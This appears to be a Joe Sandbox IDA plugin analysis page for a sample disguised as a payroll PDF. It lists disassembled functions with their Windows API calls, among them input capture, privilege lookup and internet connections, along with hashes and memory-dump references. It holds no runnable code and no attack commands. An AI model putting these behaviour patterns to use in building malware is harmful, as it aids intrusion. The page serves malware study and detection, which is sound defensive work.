Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 975b192b549689d55146ce2b1b830cf9fcec7a78bf56a2e63ca0b2bf638e6670
Instruction ID: 70863b69bd2c127246203bdbcf0d4d30de3ca36cbda6215099f9dc334b8d54e0
Opcode Fuzzy Hash: 975b192b549689d55146ce2b1b830cf9fcec7a78bf56a2e63ca0b2bf638e6670
Instruction Fuzzy Hash: 76316830D702195AEF208E698C297FABBBAAB49390F88431BE685921D1C3748DB49751

Function 00286415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0028644B
__isleadbyte_l.LIBCMT ref: 00286479
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 002864A7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 002864DD

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 1602a41fcd51b3824dc8b280009b9907b81adcea484c968e0e6bcb7d02f71fee
Instruction ID: 99954c5e04bb028f259694bf1676451de642bd2956de769542f23f9ff6647688
Opcode Fuzzy Hash: 1602a41fcd51b3824dc8b280009b9907b81adcea484c968e0e6bcb7d02f71fee
Instruction Fuzzy Hash: 5931D039612247AFDB31AF64C849BAF7BA5FF40320F194029E855871D1E731D860DB90

Function 002D5175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 002D5189

Part of subcall function 002B387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002B3897
Part of subcall function 002B387D: GetCurrentThreadId.KERNEL32 ref: 002B389E
Part of subcall function 002B387D: AttachThreadInput.USER32(00000000,?,002B52A7), ref: 002B38A5

GetCaretPos.USER32(?), ref: 002D519A
ClientToScreen.USER32(00000000,?), ref: 002D51D5
GetForegroundWindow.USER32 ref: 002D51DB

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: e3e490b113e6caa2e90d66da856bb61d049640db4ddbee76a17ed97ae03c3254
Instruction ID: c59c5f8a92cb7481ad67204dc88da5a9532a8a9673508c218465a48b17611094
Opcode Fuzzy Hash: e3e490b113e6caa2e90d66da856bb61d049640db4ddbee76a17ed97ae03c3254
Instruction Fuzzy Hash: 02311871910108ABDB00EFA5C985AEFB7F9EF98300F10446AE816E7241EA759E55CFA4

Function 002DC788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623

GetCursorPos.USER32(?), ref: 002DC7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0028BBFB,?,?,?,?,?), ref: 002DC7D7
GetCursorPos.USER32(?), ref: 002DC824
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0028BBFB,?,?,?), ref: 002DC85E

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: fe6d8b958ac3a4fad6561eca8f6b7e30051ec0d19318737c9426ad93587a0fd9
Instruction ID: 86dea8411a312fb26cdd1577d5139b8befc1b62306fb14d8d171e87a7d92869d
Opcode Fuzzy Hash: fe6d8b958ac3a4fad6561eca8f6b7e30051ec0d19318737c9426ad93587a0fd9
Instruction Fuzzy Hash: 9B31B635610019EFCB16CF98D898EEA7BBAEB09310F54406AF906CB261C7315D60EF64

Function 002A8B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002A8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002A8669
Part of subcall function 002A8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002A8673
Part of subcall function 002A8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8682
Part of subcall function 002A8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8689
Part of subcall function 002A8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A869F

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002A8BEB
_memcmp.LIBCMT ref: 002A8C0E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A8C44
HeapFree.KERNEL32(00000000), ref: 002A8C4B

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 438445206e7f179a2249b78b97226f1423b1023baabd49fcc390f96878926b54
Instruction ID: b496db1313e6a2475e79951b454cfb510800b617bd1b8368aaa169d78297a84f
Opcode Fuzzy Hash: 438445206e7f179a2249b78b97226f1423b1023baabd49fcc390f96878926b54
Instruction Fuzzy Hash: 64218B71E12209EBDB04DFA4C948BAEB7B9EF41355F04409AE455A7240DB30AE16CF60

Function 00270BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00270BF2

Part of subcall function 00255B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,002B7B20,?,?,00000000), ref: 00255B8C
Part of subcall function 00255B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,002B7B20,?,?,00000000,?,?), ref: 00255BB0

_fprintf.LIBCMT ref: 00270C29
OutputDebugStringW.KERNEL32(?), ref: 002A6331

Part of subcall function 00274CDA: _flsall.LIBCMT ref: 00274CF3

__setmode.LIBCMT ref: 00270C5E

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 19780cedf203f68308a994b3340d9dcaa13ca49a5612b085fcdd745df5ebd3ac
Instruction ID: 97c3a91b66e57e452aebb8ad6a983188c7e0568be10179c7e018787af5a996d5
Opcode Fuzzy Hash: 19780cedf203f68308a994b3340d9dcaa13ca49a5612b085fcdd745df5ebd3ac
Instruction Fuzzy Hash: DA115732924208ABCB05B7B49C879BEBB6C9F41320F14815AF20857181DF700DBA8B95

Function 002C1A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002C1A97

Part of subcall function 002C1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002C1B40
Part of subcall function 002C1B21: InternetCloseHandle.WININET(00000000), ref: 002C1BDD

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 82bc369a4240a0de02e5b341b8025513eacda1a5545e7b65109ea91af60d2043
Instruction ID: 30816c634c01c199a2ca9d911f354c7ffdfa66e379904e8c9014236595fbb415
Opcode Fuzzy Hash: 82bc369a4240a0de02e5b341b8025513eacda1a5545e7b65109ea91af60d2043
Instruction Fuzzy Hash: 4521CF31211601BFEB129F608C06FBAB7A9FF45700F14021EFA0696652EB71E834DBA4

Function 002AE1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 002AF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,002AE1C4,?,?,?,002AEFB7,00000000,000000EF,00000119,?,?), ref: 002AF5BC
Part of subcall function 002AF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 002AF5E2
Part of subcall function 002AF5AD: lstrcmpiW.KERNEL32(00000000,?,002AE1C4,?,?,?,002AEFB7,00000000,000000EF,00000119,?,?), ref: 002AF613

lstrlenW.KERNEL32(?,00000002,?,?,?,?,002AEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 002AE1DD
lstrcpyW.KERNEL32(00000000,?), ref: 002AE203
lstrcmpiW.KERNEL32(00000002,cdecl,?,002AEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 002AE237

Strings

cdecl, xrefs: 002AE22E

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 26d4627d38d26fda3fbf66c79bac90e5faa06864936a8a75b245fe437d123524
Instruction ID: f4d452a8c1626396258521e3a4037ed6eb87b4c33b780869e30b9f88ff13bc35
Opcode Fuzzy Hash: 26d4627d38d26fda3fbf66c79bac90e5faa06864936a8a75b245fe437d123524
Instruction Fuzzy Hash: 91118436110345EFCF25AF64D849A7A77A8FF46350B41802AE806C7250EF71D9619BA4

Function 00285332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00285351

Part of subcall function 0027594C: __FF_MSGBANNER.LIBCMT ref: 00275963
Part of subcall function 0027594C: __NMSG_WRITE.LIBCMT ref: 0027596A
Part of subcall function 0027594C: RtlAllocateHeap.NTDLL(01930000,00000000,00000001,00000000,?,?,?,00271013,?), ref: 0027598F

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7089e2a406229220fd648bd7ca0d3b439750eee1a1db5886828866d2f525e204
Instruction ID: 7c6b4d6e8f32194740c087222169e2ec1a9fec06c3830430b8d888881084421e
Opcode Fuzzy Hash: 7089e2a406229220fd648bd7ca0d3b439750eee1a1db5886828866d2f525e204
Instruction Fuzzy Hash: 3E112732926A26EFCB313F70EC4865D37985F143E0F1084AAF9099A0D0DFB08D709B90

Function 00254531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00254560

Part of subcall function 0025410D: _memset.LIBCMT ref: 0025418D
Part of subcall function 0025410D: _wcscpy.LIBCMT ref: 002541E1
Part of subcall function 0025410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002541F1

KillTimer.USER32(?,00000001,?,?), ref: 002545B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002545C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0028D6CE

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: ce9460d9236bf073fea2c481c2404b204a2ddb7c1c38bc8c7a73c5bdf310d20f
Instruction ID: c797c817e25b92756f841c920d8ce38e4497dd403e783495f1c4e4bc78b57e70
Opcode Fuzzy Hash: ce9460d9236bf073fea2c481c2404b204a2ddb7c1c38bc8c7a73c5bdf310d20f
Instruction Fuzzy Hash: A42128749153989FE7329B20A845BE7FBEC9F11308F00009EE68E561C1D7B41A988B45

Function 002B40B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 002B40D1
_memset.LIBCMT ref: 002B40F2
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 002B4144
CloseHandle.KERNEL32(00000000), ref: 002B414D

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 97d197e06290d6f917fed6d62fba421d8b25dcd6a242774ce080abb821b974f4
Instruction ID: ac602ce7236210e979d9dc74cbc75550ad3345704cecb6e65b3807dae5d5a652
Opcode Fuzzy Hash: 97d197e06290d6f917fed6d62fba421d8b25dcd6a242774ce080abb821b974f4
Instruction Fuzzy Hash: BF11AB75D112287AD730ABA5AC4DFEBBB7CEF44760F104596F908D7180D6744F808BA4

Function 002C667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00255B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,002B7B20,?,?,00000000), ref: 00255B8C
Part of subcall function 00255B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,002B7B20,?,?,00000000,?,?), ref: 00255BB0

gethostbyname.WSOCK32(?,?,?), ref: 002C66AC
WSAGetLastError.WSOCK32(00000000), ref: 002C66B7
_memmove.LIBCMT ref: 002C66E4
inet_ntoa.WSOCK32(?), ref: 002C66EF

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 7af2cc43d6929d7bb77d068c95df47e5b724d28f63eeadd7c129b951273ee3c2
Instruction ID: 99ed2f98127db0bb04bddb757073a5e5dcd32cd430e86cba6f42807c6fb1cb9f
Opcode Fuzzy Hash: 7af2cc43d6929d7bb77d068c95df47e5b724d28f63eeadd7c129b951273ee3c2
Instruction Fuzzy Hash: DF119335920108AFCB00EBA4DD9ADEEB7B8AF04311B144129F906A7261DF309F28DF55

Function 002A9023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 002A9043
SendMessageW.USER32(?,000000C9,?,00000000), ref: 002A9055
SendMessageW.USER32(?,000000C9,?,00000000), ref: 002A906B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 002A9086

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c899876cac3befe7f091f5074c231d3e2521e3ef1601a25702fb7313437f00ae
Instruction ID: fa8d8390852bebb4f2f80949ff695d59d7cad8bb7ef9f68b9091f43bf9c9d0ba
Opcode Fuzzy Hash: c899876cac3befe7f091f5074c231d3e2521e3ef1601a25702fb7313437f00ae
Instruction Fuzzy Hash: 98115E79901218FFDB10DFA5CD84E9DBB78FB48350F204095E904B7290DA726E50DB94

Function 00251290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623

DefDlgProcW.USER32(?,00000020,?), ref: 002512D8
GetClientRect.USER32(?,?), ref: 0028B84B
GetCursorPos.USER32(?), ref: 0028B855
ScreenToClient.USER32(?,?), ref: 0028B860

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 40a530516d2a31c301ca8b042bb7644d4375d4ef8fb84d32d2be956038307384
Instruction ID: dd00455f48d8c5ae98d12b27c6036271cfc1d4d0787a4d02821322a98161beac
Opcode Fuzzy Hash: 40a530516d2a31c301ca8b042bb7644d4375d4ef8fb84d32d2be956038307384
Instruction Fuzzy Hash: F7112B35911029BFCB00DF94D989AFE77B8EB05305F404456FD11E7150C730AA65CBA9

Function 002B1652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002B01FD,?,002B1250,?,00008000), ref: 002B166F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,002B01FD,?,002B1250,?,00008000), ref: 002B1694
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002B01FD,?,002B1250,?,00008000), ref: 002B169E
Sleep.KERNEL32(?,?,?,?,?,?,?,002B01FD,?,002B1250,?,00008000), ref: 002B16D1

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: d2d79b79741cfb7e06b847f5211bcd9394003ecdd84d5ee0cfe8b76ef11c01be
Instruction ID: b7e3fdef6c8c415067516241931caca473551f779668d669d5a2cb85835d6ec0
Opcode Fuzzy Hash: d2d79b79741cfb7e06b847f5211bcd9394003ecdd84d5ee0cfe8b76ef11c01be
Instruction Fuzzy Hash: 0B118E31C2151DE7CF049FA6E958AEEBB7CFF09781F444056E945B2240CB709970CB96

Function 00287207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0028722B

Part of subcall function 00287912: __fltout2.LIBCMT ref: 0028793B

__cftog_l.LIBCMT ref: 00287251
__cftoe_l.LIBCMT ref: 00287283

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 55cc1116e9accffccacdcd6a5e5e494a6675e920fc7b33a6ec4bddf386bc76e3
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: EA01403A06914ABBCF526E84CC418EE3F62BF59351F688615FE1858075D337C9B1AB81

Function 002DB57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 002DB59E
ScreenToClient.USER32(?,?), ref: 002DB5B6
ScreenToClient.USER32(?,?), ref: 002DB5DA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 002DB5F5

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
